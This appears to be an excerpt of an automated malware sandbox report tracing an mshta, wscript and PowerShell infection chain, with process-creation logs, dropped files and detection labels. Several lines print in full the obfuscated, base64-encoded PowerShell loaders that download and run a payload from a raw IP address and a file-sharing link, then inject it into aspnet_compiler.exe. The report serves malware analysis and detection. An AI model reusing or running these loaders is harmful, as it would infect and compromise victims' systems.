INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior

Suspicious command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.cmdline"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_046B0ABC pushad ; iretd	3_2_046B0ABD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04DD31FB pushad ; ret	13_2_04DD3209
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04DD320B pushfd ; ret	13_2_04DD3219
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04DD29B1 push C36D3E22h; ret	13_2_04DD29E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0041E922 push es; retf	16_2_0041E926
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_004032D0 push eax; ret	16_2_004032D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00401BD8 pushad ; ret	16_2_00401BDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_004163F3 push edi; retf	16_2_004164AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00416390 push cs; iretd	16_2_004163C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00416393 push cs; iretd	16_2_004163C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00404C4C push ebx; retf	16_2_00404CDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00416453 push edi; retf	16_2_004164AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00404C65 push ebx; retf	16_2_00404CDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00416438 push edi; retf	16_2_004164AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00423594 pushfd ; retf	16_2_00423595
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00414616 push ebp; ret	16_2_00414631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00414623 push ebp; ret	16_2_00414631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00418E31 push FFFFFFF1h; ret	16_2_00418E3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0041E6A0 pushfd ; ret	16_2_0041E6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0041EF45 push edi; retf	16_2_0041EF5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0041EF53 push edi; retf	16_2_0041EF5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0040CFAF push esp; retf	16_2_0040CFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B09AD push ecx; mov dword ptr [esp], ecx	16_2_015B09B6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
